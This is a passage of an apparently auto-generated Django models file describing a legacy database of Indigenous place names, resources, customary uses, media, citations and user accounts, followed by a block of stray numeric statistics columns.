enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'localityplaceresourceevent'
unique_together = (('placeresourceid', 'localityid'),)
class Lookupactivity(models.Model):
activity = models.CharField(db_column='Activity', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupactivity'
class Lookupauthortype(models.Model):
authortype = models.CharField(db_column='AuthorType', unique=True, max_length=50) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupauthortype'
class Lookupcustomaryuse(models.Model):
usedfor = models.CharField(db_column='UsedFor', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupcustomaryuse'
class Lookuphabitat(models.Model):
habitat = models.CharField(db_column='Habitat', primary_key=True, max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuphabitat'
class Lookuplocalitytype(models.Model):
localitytype = models.CharField(db_column='LocalityType', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuplocalitytype'
class Lookupmediatype(models.Model):
mediatype = models.CharField(db_column='MediaType', primary_key=True, max_length=255) # Field name made lowercase.
mediacategory = models.CharField(db_column='MediaCategory', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupmediatype'
class Lookupparticipants(models.Model):
participants = models.CharField(db_column='Participants', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupparticipants'
class Lookuppartused(models.Model):
partused = models.CharField(db_column='PartUsed', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuppartused'
class Lookupplanningunit(models.Model):
planningunitid = models.IntegerField(db_column='PlanningUnitID', primary_key=True) # Field name made lowercase.
planningunitname = models.CharField(db_column='PlanningUnitName', max_length=100, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupplanningunit'
class Lookupreferencetype(models.Model):
documenttype = models.CharField(db_column='DocumentType', primary_key=True, max_length=25) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupreferencetype'
class Lookupresourcegroup(models.Model):
resourceclassificationgroup = models.CharField(db_column='ResourceClassificationGroup', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupresourcegroup'
class Lookupseason(models.Model):
season = models.CharField(db_column='Season', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupseason'
class Lookuptechniques(models.Model):
techniques = models.CharField(db_column='Techniques', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuptechniques'
class Lookuptiming(models.Model):
timing = models.CharField(db_column='Timing', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuptiming'
class Lookuptribe(models.Model):
id = models.IntegerField(db_column='ID', primary_key=True) # Field name made lowercase.
tribeunit = models.CharField(db_column='TribeUnit', max_length=50, blank=True, null=True) # Field name made lowercase.
tribe = models.CharField(db_column='Tribe', max_length=100, blank=True, null=True) # Field name made lowercase.
federaltribe = models.CharField(db_column='FederalTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuptribe'
class Lookupuserinfo(models.Model):
username = models.CharField(db_column='UserName', max_length=100, blank=True, null=True) # Field name made lowercase.
usingcustomusername = models.IntegerField(db_column='UsingCustomUsername') # Field name made lowercase.
usertitle = models.CharField(db_column='UserTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
useraffiliation = models.CharField(db_column='UserAffiliation', max_length=100, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupuserinfo'
class Media(models.Model):
mediaid = models.IntegerField(db_column='MediaID', primary_key=True) # Field name made lowercase.
mediatype = models.CharField(db_column='MediaType', max_length=255, blank=True, null=True) # Field name made lowercase.
medianame = models.CharField(db_column='MediaName', max_length=255, blank=True, null=True) # Field name made lowercase.
mediadescription = models.TextField(db_column='MediaDescription', blank=True, null=True) # Field name made lowercase.
medialink = models.CharField(db_column='MediaLink', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'media'
class Mediacitationevents(models.Model):
mediaid = models.ForeignKey(Media, db_column='MediaID') # Field name made lowercase.
citationid = models.ForeignKey(Citations, db_column='CitationID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'mediacitationevents'
unique_together = (('mediaid', 'citationid'),)
class People(models.Model):
personid = models.IntegerField(db_column='PersonID', primary_key=True) # Field name made lowercase.
firstname = models.CharField(db_column='FirstName', max_length=255, blank=True, null=True) # Field name made lowercase.
lastname = models.CharField(db_column='LastName', max_length=255, blank=True, null=True) # Field name made lowercase.
yearborn = models.IntegerField(db_column='YearBorn', blank=True, null=True) # Field name made lowercase.
village = models.CharField(db_column='Village', max_length=255, blank=True, null=True) # Field name made lowercase.
relationshiptootherpeople = models.TextField(db_column='RelationshipToOtherPeople', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'people'
class Placealtindigenousname(models.Model):
altindigenousnameid = models.IntegerField(db_column='AltIndigenousNameID', primary_key=True) # Field name made lowercase.
placeid = models.IntegerField(db_column='PlaceID', blank=True, null=True) # Field name made lowercase.
altindigenousname = models.CharField(db_column='AltIndigenousName', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placealtindigenousname'
class Placegisselections(models.Model):
placeid = models.IntegerField(db_column='PlaceID', blank=True, null=True) # Field name made lowercase.
placelabel = models.CharField(db_column='PlaceLabel', max_length=255, blank=True, null=True) # Field name made lowercase.
sourcefc = models.CharField(db_column='SourceFC', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placegisselections'
class Places(models.Model):
placeid = models.IntegerField(db_column='PlaceID', primary_key=True) # Field name made lowercase.
indigenousplacename = models.CharField(db_column='IndigenousPlaceName', max_length=255, blank=True, null=True) # Field name made lowercase.
indigenousplacenamemeaning = models.CharField(db_column='IndigenousPlaceNameMeaning', max_length=255, blank=True, null=True) # Field name made lowercase.
englishplacename = models.CharField(db_column='EnglishPlaceName', max_length=255, blank=True, null=True) # Field name made lowercase.
planningunitid = models.IntegerField(db_column='PlanningUnitID', blank=True, null=True) # Field name made lowercase.
primaryhabitat = models.CharField(db_column='PrimaryHabitat', max_length=100, blank=True, null=True) # Field name made lowercase.
tribeid = models.IntegerField(db_column='TribeID', blank=True, null=True) # Field name made lowercase.
islocked = models.IntegerField(db_column='IsLocked') # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'places'
class Placescitationevents(models.Model):
placeid = models.ForeignKey(Places, db_column='PlaceID') # Field name made lowercase.
citationid = models.IntegerField(db_column='CitationID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placescitationevents'
unique_together = (('placeid', 'citationid'),)
class Placesmediaevents(models.Model):
placeid = models.ForeignKey(Places, db_column='PlaceID') # Field name made lowercase.
mediaid = models.ForeignKey(Media, db_column='MediaID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placesmediaevents'
unique_together = (('placeid', 'mediaid'),)
class Placesresourcecitationevents(models.Model):
placeresourceid = models.ForeignKey('Placesresourceevents', db_column='PlaceResourceID') # Field name made lowercase.
citationid = models.IntegerField(db_column='CitationID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placesresourcecitationevents'
unique_together = (('placeresourceid', 'citationid'),)
class Placesresourceevents(models.Model):
placeresourceid = models.IntegerField(db_column='PlaceResourceID', primary_key=True) # Field name made lowercase.
placeid = models.ForeignKey(Places, db_column='PlaceID', blank=True, null=True) # Field name made lowercase.
resourceid = models.IntegerField(db_column='ResourceID', blank=True, null=True) # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
partused = models.CharField(db_column='PartUsed', max_length=255, blank=True, null=True) # Field name made lowercase.
customaryuse = models.CharField(db_column='CustomaryUse', max_length=255, blank=True, null=True) # Field name made lowercase.
barterresource = models.IntegerField(db_column='BarterResource') # Field name made lowercase.
season = models.CharField(db_column='Season', max_length=255, blank=True, null=True) # Field name made lowercase.
timing = models.CharField(db_column='Timing', max_length=255, blank=True, null=True) # Field name made lowercase.
january = models.IntegerField(db_column='January') # Field name made lowercase.
february = models.IntegerField(db_column='February') # Field name made lowercase.
march = models.IntegerField(db_column='March') # Field name made lowercase.
april = models.IntegerField(db_column='April') # Field name made lowercase.
may = models.IntegerField(db_column='May') # Field name made lowercase.
june = models.IntegerField(db_column='June') # Field name made lowercase.
july = models.IntegerField(db_column='July') # Field name made lowercase.
august = models.IntegerField(db_column='August') # Field name made lowercase.
september = models.IntegerField(db_column='September') # Field name made lowercase.
october = models.IntegerField(db_column='October') # Field name made lowercase.
november = models.IntegerField(db_column='November') # Field name made lowercase.
december = models.IntegerField(db_column='December') # Field name made lowercase.
year = models.SmallIntegerField(db_column='Year', blank=True, null=True) # Field name made lowercase.
islocked = models.IntegerField(db_column='IsLocked') # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placesresourceevents'
class Placesresourcemediaevents(models.Model):
placeresourceid = models.ForeignKey(Placesresourceevents, db_column='PlaceResourceID') # Field name made lowercase.
mediaid = models.IntegerField(db_column='MediaID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'placesresourcemediaevents'
unique_together = (('placeresourceid', 'mediaid'),)
class Resourceactivitycitationevents(models.Model):
resourceactivityid = models.ForeignKey('Resourcesactivityevents', db_column='ResourceActivityID') # Field name made lowercase.
citationid = models.IntegerField(db_column='CitationID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourceactivitycitationevents'
unique_together = (('resourceactivityid', 'citationid'),)
class Resourceactivitymediaevents(models.Model):
resourceactivityid = models.ForeignKey('Resourcesactivityevents', db_column='ResourceActivityID') # Field name made lowercase.
mediaid = models.IntegerField(db_column='MediaID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourceactivitymediaevents'
unique_together = (('resourceactivityid', 'mediaid'),)
class Resourcealtindigenousname(models.Model):
altindigenousnameid = models.IntegerField(db_column='AltIndigenousNameID', primary_key=True) # Field name made lowercase.
resourceid = models.IntegerField(db_column='ResourceID', blank=True, null=True) # Field name made lowercase.
altindigenousname = models.CharField(db_column='AltIndigenousName', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourcealtindigenousname'
class Resourceresourceevents(models.Model):
resourceid = models.IntegerField(db_column='ResourceID') # Field name made lowercase.
altresourceid = models.IntegerField(db_column='AltResourceID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourceresourceevents'
unique_together = (('resourceid', 'altresourceid'),)
class Resources(models.Model):
resourceid = models.IntegerField(db_column='ResourceID', primary_key=True) # Field name made lowercase.
commonname = models.CharField(db_column='CommonName', max_length=255, blank=True, null=True) # Field name made lowercase.
indigenousname = models.CharField(db_column='IndigenousName', max_length=255, blank=True, null=True) # Field name made lowercase.
genus = models.CharField(db_column='Genus', max_length=255, blank=True, null=True) # Field name made lowercase.
species = models.CharField(db_column='Species', max_length=255, blank=True, null=True) # Field name made lowercase.
specific = models.IntegerField(db_column='Specific') # Field name made lowercase.
resourceclassificationgroup = models.CharField(db_column='ResourceClassificationGroup', max_length=255, blank=True, null=True) # Field name made lowercase.
islocked = models.IntegerField(db_column='IsLocked') # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resources'
class Resourcesactivityevents(models.Model):
resourceactivityid = models.IntegerField(db_column='ResourceActivityID', primary_key=True) # Field name made lowercase.
placeresourceid = models.ForeignKey(Placesresourceevents, db_column='PlaceResourceID', blank=True, null=True) # Field name made lowercase.
relationshipdescription = models.TextField(db_column='RelationshipDescription', blank=True, null=True) # Field name made lowercase.
partused = models.CharField(db_column='PartUsed', max_length=255, blank=True, null=True) # Field name made lowercase.
activityshortdescription = models.CharField(db_column='ActivityShortDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
activitylongdescription = models.TextField(db_column='ActivityLongDescription', blank=True, null=True) # Field name made lowercase.
participants = models.CharField(db_column='Participants', max_length=50, blank=True, null=True) # Field name made lowercase.
technique = models.CharField(db_column='Technique', max_length=255, blank=True, null=True) # Field name made lowercase.
gear = models.CharField(db_column='Gear', max_length=255, blank=True, null=True) # Field name made lowercase.
customaryuse = models.CharField(db_column='CustomaryUse', max_length=255, blank=True, null=True) # Field name made lowercase.
timing = models.CharField(db_column='Timing', max_length=255, blank=True, null=True) # Field name made lowercase.
timingdescription = models.CharField(db_column='TimingDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
islocked = models.IntegerField(db_column='IsLocked') # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourcesactivityevents'
class Resourcescitationevents(models.Model):
resourceid = models.ForeignKey(Resources, db_column='ResourceID') # Field name made lowercase.
citationid = models.ForeignKey(Citations, db_column='CitationID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourcescitationevents'
unique_together = (('resourceid', 'citationid'),)
class Resourcesmediaevents(models.Model):
resourceid = models.ForeignKey(Resources, db_column='ResourceID') # Field name made lowercase.
mediaid = models.ForeignKey(Media, db_column='MediaID') # Field name made lowercase.
relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True) # Field name made lowercase.
pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'resourcesmediaevents'
unique_together = (('resourceid', 'mediaid'),)
class Useraccess(models.Model):
accessid = models.IntegerField(db_column='AccessID', primary_key=True) # Field name made lowercase.
accesslevel = models.CharField(db_column='AccessLevel', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'useraccess'
class Users(models.Model):
userid = models.IntegerField(db_column='UserID', primary_key=True) # Field name made lowercase.
username = models.CharField(db_column='UserName', max_length=20, blank=True, null=True) # Field name made lowercase.
password = models.CharField(db_column='Password', max_length=20, blank=True, null=True) # Field name made lowercase.
firstname = models.CharField(db_column='FirstName', max_length=255, blank=True, null=True) # Field name made lowercase.
lastname = models.CharField(db_column='LastName', max_length=255, blank=True, null=True) # Field name made lowercase.
affiliation = models.CharField(db_column='Affiliation', max_length=255, blank=True, null=True) # Field name made lowercase.
title = models.CharField(db_column='Title', max_length=255, blank=True, null=True) # Field name made lowercase.
accesslevel = models.IntegerField(db_column='AccessLevel', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'users'
| 72.257053
| 160
| 0.75167
| 5,519
| 46,100
| 6.167784
| 0.044392
| 0.075206
| 0.122209
| 0.206816
| 0.80329
| 0.801939
| 0.777145
| 0.764571
| 0.743449
| 0.743449
| 0
| 0.014255
| 0.141757
| 46,100
| 637
| 161
| 72.370487
| 0.846101
| 0.197874
| 0
| 0.586826
| 1
| 0
| 0.13717
| 0.020356
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001996
| 0.003992
| 0
| 0.810379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
